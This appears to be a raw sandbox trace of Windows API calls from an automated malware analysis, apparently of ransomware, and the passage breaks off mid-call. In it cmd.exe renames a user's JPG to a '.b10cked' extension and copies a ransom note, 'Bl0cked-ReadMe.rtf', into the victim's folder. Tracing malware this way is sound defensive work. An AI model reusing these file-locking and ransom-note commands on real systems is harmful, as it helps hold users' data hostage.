[0140.468] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0140.950] GetConsoleTitleW (in: lpConsoleTitle=0x1ef7a0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.950] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0140.950] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0140.950] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0140.950] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0140.950] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0140.950] _wcsicmp (_String1="move", _String2="CD") returned 10 [0140.950] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0140.950] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0140.950] _wcsicmp (_String1="move", _String2="REN") returned -5 [0140.950] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0140.951] _wcsicmp (_String1="move", _String2="SET") returned -6 [0140.951] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0140.951] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0140.951] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0140.951] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0140.951] _wcsicmp (_String1="move", _String2="MD") returned 11 [0140.951] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0140.951] _wcsicmp (_String1="move", _String2="RD") returned -5 [0140.951] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0140.951] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0140.951] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0140.951] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0140.951] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0140.951] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0140.951] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0140.951] _wcsicmp (_String1="move", _String2="VER") returned -9 [0140.951] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0140.951] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0140.951] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0140.951] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0140.951] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0140.951] _wcsicmp (_String1="move", _String2="START") returned -6 [0140.951] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0140.951] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0140.951] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0140.953] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0140.953] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0140.953] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1ef55c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x1ef554, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1ef554*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0140.953] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0140.953] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0140.953] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0140.953] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0140.953] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0140.953] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0140.953] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0140.953] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0140.953] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0140.953] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0140.953] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0140.954] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0140.954] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0140.954] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0140.954] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0140.954] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.954] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.954] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.954] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.954] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0140.954] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0140.954] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0140.954] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0140.954] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0140.954] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0140.954] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0140.954] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0140.954] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0140.954] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0140.954] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0140.954] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0140.954] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0140.954] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0140.954] _wcsicmp (_String1="4_IRBU~1.JPG", _String2=".") returned 6 [0140.955] _wcsicmp (_String1="4_IRBU~1.JPG", _String2="..") returned 6 [0140.955] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\4_IRBU~1.JPG" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\u7e2t\\4_irbu~1.jpg")) returned 0x20 [0140.955] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x251f18 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.955] SetErrorMode (uMode=0x0) returned 0x0 [0140.955] SetErrorMode (uMode=0x1) returned 0x0 [0140.955] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\4_IRBU~1.JPG", nBufferLength=0x104, lpBuffer=0x1eeee4, lpFilePart=0x1eeecc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\4_IRBU~1.JPG", lpFilePart=0x1eeecc*="4_IRBU~1.JPG") returned 0x39 [0140.955] SetErrorMode (uMode=0x0) returned 0x1 [0140.955] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\u7e2t")) returned 0x12 [0140.955] _wcsicmp (_String1="4_IRBU~1.JPG", _String2=".") returned 6 [0140.955] _wcsicmp (_String1="4_IRBU~1.JPG", _String2="..") returned 6 [0140.955] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\4_IRBU~1.JPG" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\u7e2t\\4_irbu~1.jpg")) returned 0x20 [0140.955] SetErrorMode (uMode=0x0) returned 0x0 [0140.955] SetErrorMode (uMode=0x1) returned 0x0 [0140.955] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\4_IRBU~1.JPG", nBufferLength=0x104, lpBuffer=0x1ef360, lpFilePart=0x1ef0f8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\4_IRBU~1.JPG", lpFilePart=0x1ef0f8*="4_IRBU~1.JPG") returned 0x39 [0140.955] SetErrorMode (uMode=0x0) returned 0x1 [0140.956] SetErrorMode (uMode=0x0) returned 0x0 [0140.956] SetErrorMode (uMode=0x1) returned 0x0 [0140.956] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\4_Irbu3SMZgt2KGk_cO7.jpg.b10cked", nBufferLength=0x104, lpBuffer=0x1ef568, lpFilePart=0x1ef0f8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\4_Irbu3SMZgt2KGk_cO7.jpg.b10cked", lpFilePart=0x1ef0f8*="4_Irbu3SMZgt2KGk_cO7.jpg.b10cked") returned 0x4d [0140.956] SetErrorMode (uMode=0x0) returned 0x1 [0140.956] SetLastError (dwErrCode=0x0) [0140.956] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\4_Irbu3SMZgt2KGk_cO7.jpg.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\u7e2t\\4_irbu3smzgt2kgk_co7.jpg.b10cked")) returned 0xffffffff [0140.956] GetLastError () returned 0x2 [0140.956] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\4_IRBU~1.JPG", fInfoLevelId=0x1, lpFindFileData=0x1eea74, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eea74) returned 0x252128 [0140.956] FindNextFileW (in: hFindFile=0x252128, lpFindFileData=0x1eea74 | out: lpFindFileData=0x1eea74) returned 0 [0140.957] GetLastError () returned 0x12 [0140.957] FindClose (in: hFindFile=0x252128 | out: hFindFile=0x252128) returned 1 [0140.958] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\4_IRBU~1.JPG", fInfoLevelId=0x1, lpFindFileData=0x251cb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x251cb8) returned 0x252128 [0140.958] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\4_Irbu3SMZgt2KGk_cO7.jpg.b10cked", nBufferLength=0x104, lpBuffer=0x1eed0c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\4_Irbu3SMZgt2KGk_cO7.jpg.b10cked", lpFilePart=0x0) returned 0x4d [0140.958] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\4_Irbu3SMZgt2KGk_cO7.jpg", nBufferLength=0x104, lpBuffer=0x1eed0c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\4_Irbu3SMZgt2KGk_cO7.jpg", lpFilePart=0x0) returned 0x45 [0140.958] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\4_Irbu3SMZgt2KGk_cO7.jpg" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\u7e2t\\4_irbu3smzgt2kgk_co7.jpg")) returned 0x20 [0140.958] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\4_Irbu3SMZgt2KGk_cO7.jpg" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\u7e2t\\4_irbu3smzgt2kgk_co7.jpg"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\4_Irbu3SMZgt2KGk_cO7.jpg.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\u7e2t\\4_irbu3smzgt2kgk_co7.jpg.b10cked"), dwFlags=0x3) returned 1 [0140.958] FindClose (in: hFindFile=0x252128 | out: hFindFile=0x252128) returned 1 [0140.959] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x1eecc0 | out: _Buffer=" 1") returned 9 [0140.959] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.959] GetFileType (hFile=0x7) returned 0x2 [0140.959] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0140.959] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1eec4c | out: lpMode=0x1eec4c) returned 1 [0140.959] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.959] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eec80 | out: lpConsoleScreenBufferInfo=0x1eec80) returned 1 [0140.959] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0140.960] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x1eecc0 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0140.960] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x1eeca4, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1eeca4*=0x1a) returned 1 [0140.960] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.960] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0140.960] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.960] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0140.960] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.960] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0140.961] SetConsoleInputExeNameW () returned 0x1 [0140.961] GetConsoleOutputCP () returned 0x1b5 [0140.961] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.961] SetThreadUILanguage (LangId=0x0) returned 0x409 [0140.961] exit (_Code=0) Process: id = "177" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16e00" os_pid = "0xfb4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 15048 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 15049 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 15050 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 15051 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 15052 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 15053 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 15054 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 15055 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 15056 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 15057 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 16118 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 16119 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 16120 start_va = 0x190000 end_va = 0x1f6fff entry_point = 0x190000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 16121 start_va = 0x230000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 16122 start_va = 0x3c0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 16123 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 16124 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 16125 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 16126 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 16127 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 16128 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 16129 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 16130 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 16131 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 16132 start_va = 0x3d0000 end_va = 0x497fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 16133 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 16134 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 16135 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 16136 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 16137 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 16138 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 16139 start_va = 0x4a0000 end_va = 0x5a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 16140 start_va = 0x5b0000 end_va = 0x11affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 16141 start_va = 0x11b0000 end_va = 0x1312fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011b0000" filename = "" Thread: id = 234 os_tid = 0xfac [0141.818] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff04 | out: lpSystemTimeAsFileTime=0x18ff04*(dwLowDateTime=0x8e772a60, dwHighDateTime=0x1d440a9)) [0141.818] GetCurrentProcessId () returned 0xfb4 [0141.818] GetCurrentThreadId () returned 0xfac [0141.818] GetTickCount () returned 0x2c6e6 [0141.818] QueryPerformanceCounter (in: lpPerformanceCount=0x18fefc | out: lpPerformanceCount=0x18fefc*=19860731234) returned 1 [0141.825] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0141.825] __set_app_type (_Type=0x1) [0141.825] __p__fmode () returned 0x76b331f4 [0141.825] __p__commode () returned 0x76b331fc [0141.826] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0141.826] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0141.826] GetCurrentThreadId () returned 0xfac [0141.826] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xfac) returned 0x38 [0141.826] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0141.826] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0141.826] SetThreadUILanguage (LangId=0x0) returned 0x409 [0141.826] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0141.826] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18fe94 | out: phkResult=0x18fe94*=0x0) returned 0x2 [0141.826] VirtualQuery (in: lpAddress=0x18fecb, lpBuffer=0x18fe64, dwLength=0x1c | out: lpBuffer=0x18fe64*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.826] VirtualQuery (in: lpAddress=0x90000, lpBuffer=0x18fe64, dwLength=0x1c | out: lpBuffer=0x18fe64*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0141.826] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18fe64, dwLength=0x1c | out: lpBuffer=0x18fe64*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0141.826] VirtualQuery (in: lpAddress=0x93000, lpBuffer=0x18fe64, dwLength=0x1c | out: lpBuffer=0x18fe64*(BaseAddress=0x93000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.826] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18fe64, dwLength=0x1c | out: lpBuffer=0x18fe64*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0141.827] GetConsoleOutputCP () returned 0x1b5 [0141.827] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0141.827] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0141.827] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.827] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0141.827] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.827] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0141.827] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.827] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0141.827] _get_osfhandle (_FileHandle=0) returned 0x3 [0141.827] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0141.828] _get_osfhandle (_FileHandle=0) returned 0x3 [0141.828] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0141.828] GetEnvironmentStringsW () returned 0x2401a8* [0141.828] FreeEnvironmentStringsW (penv=0x2401a8) returned 1 [0141.828] GetEnvironmentStringsW () returned 0x2401a8* [0141.828] FreeEnvironmentStringsW (penv=0x2401a8) returned 1 [0141.828] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18ee04 | out: phkResult=0x18ee04*=0x40) returned 0x0 [0141.828] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18ee0c, lpData=0x18ee10, lpcbData=0x18ee08*=0x1000 | out: lpType=0x18ee0c*=0x0, lpData=0x18ee10*=0xd0, lpcbData=0x18ee08*=0x1000) returned 0x2 [0141.828] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18ee0c, lpData=0x18ee10, lpcbData=0x18ee08*=0x1000 | out: lpType=0x18ee0c*=0x4, lpData=0x18ee10*=0x1, lpcbData=0x18ee08*=0x4) returned 0x0 [0141.828] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18ee0c, lpData=0x18ee10, lpcbData=0x18ee08*=0x1000 | out: lpType=0x18ee0c*=0x0, lpData=0x18ee10*=0x1, lpcbData=0x18ee08*=0x1000) returned 0x2 [0141.828] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18ee0c, lpData=0x18ee10, lpcbData=0x18ee08*=0x1000 | out: lpType=0x18ee0c*=0x4, lpData=0x18ee10*=0x0, lpcbData=0x18ee08*=0x4) returned 0x0 [0141.828] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18ee0c, lpData=0x18ee10, lpcbData=0x18ee08*=0x1000 | out: lpType=0x18ee0c*=0x4, lpData=0x18ee10*=0x40, lpcbData=0x18ee08*=0x4) returned 0x0 [0141.828] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18ee0c, lpData=0x18ee10, lpcbData=0x18ee08*=0x1000 | out: lpType=0x18ee0c*=0x4, lpData=0x18ee10*=0x40, lpcbData=0x18ee08*=0x4) returned 0x0 [0141.828] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, 